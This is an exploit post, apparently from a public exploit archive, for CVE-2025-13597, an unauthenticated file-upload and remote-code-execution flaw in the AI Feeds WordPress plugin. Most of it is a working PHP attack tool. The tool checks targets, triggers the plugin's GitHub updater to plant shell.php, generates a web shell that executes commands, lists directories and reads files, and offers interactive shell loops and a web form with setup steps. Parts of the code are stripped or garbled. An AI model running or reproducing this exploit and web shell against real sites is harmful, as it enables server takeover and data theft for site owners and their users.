============================================================================================================================================= | # Title : AI Feeds 1.0.11 Unauthenticated RCE Exploit | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://ai.cibeles.net/ | ============================================================================================================================================= POC : [+] References : https://packetstorm.news/files/id/212113/ & CVE-2025-13597 [+] Summary : an unauthenticated arbitrary file upload vulnerability in the AI Feeds plugin for WordPress versions 1.0.11 and earlier. The vulnerability allows unauthenticated attackers to upload arbitrary files, including PHP webshells, by exploiting the GitHub integration functionality, leading to remote code execution and complete server compromise. The vulnerability exists in the actualizador_git.php file which provides unauthenticated access to download and execute files from arbitrary GitHub repositories without proper security controls. [+] POC : # Execute a single command `php poc.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -c 'id'` # Interactive shell `php poc.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -i` # Create a shell for the repo `php poc.php --create-shell` #!/usr/bin/env php target = rtrim($target_url, '/'); } public function check_vulnerability() { echo "[*] Checking if target is vulnerable...\n"; // Check if AI Feeds plugin exists $plugin_path = $this->target . '/wp-content/plugins/ai-feeds/'; $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'timeout' => 10, 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ] ]); // Check for plugin directory $response = @file_get_contents($plugin_path, false, $context); if ($response === false) { // Check for actualizador_git.php directly $exploit_url = $this->target . '/wp-content/plugins/ai-feeds/actualizador_git.php'; $response = @file_get_contents($exploit_url, false, $context); if ($response !== false) { echo "[+] AI Feeds plugin detected - likely vulnerable\n"; return true; } } else { echo "[+] AI Feeds plugin directory found - likely vulnerable\n"; return true; } echo "[-] AI Feeds plugin not found or not accessible\n"; return false; } public function exploit($owner, $repo, $token, $command = 'whoami') { echo "[*] Exploiting actualizador_git.php vulnerability...\n"; echo "[*] Target: " . $this->target . "\n"; echo "[*] GitHub Repository: {$owner}/{$repo}\n"; $exploit_url = $this->target . '/wp-content/plugins/ai-feeds/actualizador_git.php'; $params = [ 'owner' => $owner, 'repo' => $repo, 'ref' => 'main', 'token' => $token ]; $query_string = http_build_query($params); $full_url = $exploit_url . '?' . $query_string; echo "[*] Sending exploit request...\n"; echo "[*] URL: " . $full_url . "\n"; $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'timeout' => 30, 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ] ]); $response = @file_get_contents($full_url, false, $context); if ($response === false) { echo "[-] Exploit request failed\n"; return false; } echo "[+] Exploit executed. Response:\n"; echo $response . "\n"; // Test shell access echo "\n[*] Testing shell access...\n"; $this->test_shell($command); return true; } private function test_shell($command) { $shell_url = $this->target . '/wp-content/plugins/ai-feeds/shell.php'; $test_url = $shell_url . '?cmd=' . urlencode($command); echo "[*] Testing command: {$command}\n"; echo "[*] Shell URL: {$shell_url}?cmd=COMMAND\n"; $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'timeout' => 10, 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ] ]); $response = @file_get_contents($test_url, false, $context); if ($response === false) { echo "[-] Shell not accessible or command failed\n"; } else { echo "[+] Command output:\n"; echo $response . "\n"; } } public function create_malicious_repo() { echo "[*] Creating malicious shell.php for GitHub repository...\n"; $shell_content = ''; file_put_contents('shell.php', $shell_content); echo "[+] Created shell.php - upload this to your GitHub repository\n"; echo "[+] Repository structure should be: /shell.php in main branch\n"; // Also create a more advanced shell $advanced_shell = '&1", $output, $return_code); return implode("\n", $output); } public function listFiles($dir = ".") { return scandir($dir); } public function readFile($file) { return file_get_contents($file); } } $ai_shell = new AIShell(); if(isset($_GET[\'action\'])) { switch($_GET[\'action\']) { case \'exec\': echo $ai_shell->execute($_GET[\'cmd\']); break; case \'ls\': $dir = isset($_GET[\'dir\']) ? $_GET[\'dir\'] : \'.\'; print_r($ai_shell->listFiles($dir)); break; case \'cat\': if(isset($_GET[\'file\'])) { echo $ai_shell->readFile($_GET[\'file\']); } break; default: echo "Available actions: exec, ls, cat"; } } else { echo "AI Feeds Web Shell - Ready"; } ?>'; file_put_contents('advanced_shell.php', $advanced_shell); echo "[+] Created advanced_shell.php with more features\n"; } public function interactive_shell() { $shell_url = $this->target . '/wp-content/plugins/ai-feeds/shell.php'; echo "[+] Starting interactive shell...\n"; echo "[+] Shell URL: {$shell_url}\n"; echo "[+] Type 'exit' to quit\n\n"; while (true) { echo "cmd> "; $command = trim(fgets(STDIN)); if ($command === 'exit') { break; } if (!empty($command)) { $test_url = $shell_url . '?cmd=' . urlencode($command); $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'timeout' => 10 ] ]); $response = @file_get_contents($test_url, false, $context); if ($response !== false) { echo $response . "\n"; } else { echo "[-] Command failed or shell not accessible\n"; } } } } public function advanced_shell() { $shell_url = $this->target . '/wp-content/plugins/ai-feeds/advanced_shell.php'; echo "[+] Starting advanced shell...\n"; echo "[+] Available commands:\n"; echo " ?action=exec&cmd=COMMAND - Execute command\n"; echo " ?action=ls&dir=DIRECTORY - List files\n"; echo " ?action=cat&file=FILENAME - Read file\n"; echo "[+] Type 'exit' to quit\n\n"; while (true) { echo "ai-feeds> "; $input = trim(fgets(STDIN)); if ($input === 'exit') { break; } if (!empty($input)) { if (strpos($input, 'ls') === 0) { $parts = explode(' ', $input); $dir = isset($parts[1]) ? $parts[1] : '.'; $test_url = $shell_url . '?action=ls&dir=' . urlencode($dir); } elseif (strpos($input, 'cat') === 0) { $parts = explode(' ', $input); if (isset($parts[1])) { $test_url = $shell_url . '?action=cat&file=' . urlencode($parts[1]); } else { echo "Usage: cat filename\n"; continue; } } else { $test_url = $shell_url . '?action=exec&cmd=' . urlencode($input); } $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'timeout' => 10 ] ]); $response = @file_get_contents($test_url, false, $context); if ($response !== false) { echo $response . "\n"; } else { echo "[-] Command failed or advanced shell not accessible\n"; } } } } } // Command line interface if (php_sapi_name() === 'cli') { echo " ██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗ ██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗ ██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║ ██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║ ██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║ ╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ AI Feeds <= 1.0.11 Unauthenticated RCE Exploit (CVE-2025-13597) By: indoushka \n"; $options = getopt("t:o:r:k:c:iah", [ "target:", "owner:", "repo:", "token:", "command:", "interactive", "advanced", "help", "create-shell" ]); if (isset($options['h']) || isset($options['help']) || $argc == 1) { echo "Usage: php ai_feeds_exploit.php [options]\n"; echo "Options:\n"; echo " -t, --target Target URL (required)\n"; echo " -o, --owner GitHub repository owner (required)\n"; echo " -r, --repo GitHub repository name (required)\n"; echo " -k, --token GitHub Personal Access Token (required)\n"; echo " -c, --command Command to execute (default: whoami)\n"; echo " -i, --interactive Start interactive shell\n"; echo " -a, --advanced Use advanced shell features\n"; echo " --create-shell Create malicious shell.php for GitHub repo\n"; echo " -h, --help Show this help message\n"; echo "\nExamples:\n"; echo " php ai_feeds_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -c 'id'\n"; echo " php ai_feeds_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -i\n"; echo " php ai_feeds_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -a\n"; echo " php ai_feeds_exploit.php --create-shell\n"; exit(1); } if (isset($options['create-shell'])) { $exploit = new AIFeedsExploit(''); $exploit->create_malicious_repo(); exit(0); } if (!isset($options['t']) && !isset($options['target'])) { echo "Error: Target URL is required\n"; exit(1); } if (!isset($options['o']) && !isset($options['owner'])) { echo "Error: GitHub owner is required\n"; exit(1); } if (!isset($options['r']) && !isset($options['repo'])) { echo "Error: GitHub repository is required\n"; exit(1); } if (!isset($options['k']) && !isset($options['token'])) { echo "Error: GitHub token is required\n"; exit(1); } $target = isset($options['t']) ? $options['t'] : $options['target']; $owner = isset($options['o']) ? $options['o'] : $options['owner']; $repo = isset($options['r']) ? $options['r'] : $options['repo']; $token = isset($options['k']) ? $options['k'] : $options['token']; $command = isset($options['c']) ? $options['c'] : (isset($options['command']) ? $options['command'] : 'whoami'); $exploit = new AIFeedsExploit($target); // Check vulnerability first if (!$exploit->check_vulnerability()) { echo "[-] Target does not appear to be vulnerable\n"; exit(1); } if (isset($options['a']) || isset($options['advanced'])) { // Use advanced shell $exploit->exploit($owner, $repo, $token, 'echo "Advanced shell installed"'); $exploit->advanced_shell(); } elseif (isset($options['i']) || isset($options['interactive'])) { // Interactive shell $exploit->exploit($owner, $repo, $token, 'echo "Shell installed successfully"'); $exploit->interactive_shell(); } else { // Single command execution $exploit->exploit($owner, $repo, $token, $command); } } else { // Web interface if (isset($_POST['exploit'])) { $target = $_POST['target'] ?? ''; $owner = $_POST['owner'] ?? ''; $repo = $_POST['repo'] ?? ''; $token = $_POST['token'] ?? ''; $command = $_POST['command'] ?? 'whoami'; if ($target && $owner && $repo && $token) { $exploit = new AIFeedsExploit($target); ob_start(); $exploit->check_vulnerability(); $exploit->exploit($owner, $repo, $token, $command); $output = ob_get_clean(); echo "
$output
"; } else { echo "
All fields are required
"; } } else { echo ' AI Feeds RCE Exploit

AI Feeds RCE Exploit (CVE-2025-13597)

Full URL of the WordPress site
GitHub username or organization name
Repository containing shell.php
GitHub Personal Access Token with repo access
Command to execute on target

Setup Instructions:

  1. Create a GitHub repository with a shell.php file
  2. Generate a GitHub Personal Access Token with repo permissions
  3. Fill in the form above and execute
  4. Access shell at: /wp-content/plugins/ai-feeds/shell.php?cmd=COMMAND
'; } } ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================